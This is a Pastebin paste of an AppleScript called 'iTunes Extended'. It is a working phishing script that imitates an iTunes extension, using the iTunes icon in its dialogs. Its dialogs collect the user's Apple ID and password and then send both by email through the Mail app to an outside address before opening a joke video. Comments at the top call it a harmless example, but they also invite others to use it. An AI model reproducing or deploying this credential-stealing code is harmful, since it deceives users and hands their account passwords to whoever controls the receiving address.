Advertisement
if-then-else

iTunes Extended

Jun 7th, 2015
550
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --This code is not meant to be harmful.
  2. --This is a example of how one can make a malicious script, and can fool people who think it is real.
  3. --The email the information goes to is mine, and completely safe (saying this, don't put your actual information in because I don't want to get into any trouble if anything happens
  4. --People who want to do bad to the world can use this script (why would you want to steal someone's identity you little criminal!) if they are lazy enough to not make their own.
  5. display dialog "iTunes Extended: An iTunes 3rd Party Extension " with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
  6.     ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Continue"} default button 1
  7. set appleid to ""
  8. repeat while appleid = ""
  9.     set appleid to the text returned of (display dialog "Type in your Apple ID to continue" & "                                                   (ex. \"[email protected]\")." default answer "" with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
  10.         ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Continue"} default button 1)
  11.     if appleid = "" then
  12.         display dialog "No Apple ID Entered.  Please enter your Apple ID.  An example of an Apple ID is: \"[email protected]\"" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
  13.             ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Resubmit"} default button 1
  14.     end if
  15. end repeat
  16. set pass to ""
  17. repeat while pass = ""
  18.     set pass to the text returned of (display dialog "Type in your Password to finalise." default answer "" with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
  19.         ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Finalise"} default button 1 with hidden answer)
  20.     if pass = "" then
  21.         display dialog "No Password Entered.  Please enter your password." with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
  22.             ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Resubmit"} default button 1
  23.     end if
  24. end repeat
  25. tell application "Mail"
  26.     set theMessage to make new outgoing message with properties {subject:" ", content:"Apple ID:" & appleid & "     Password:" & pass}
  27.     tell theMessage
  28.         make new to recipient at end of to recipients with properties {name:"Apple", address:"[email protected]"}
  29.     end tell
  30.     send theMessage
  31. end tell
  32. tell application "Safari" to (activate) & (open location "https://www.youtube.com/watch?v=dQw4w9WgXcQ")
  33. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement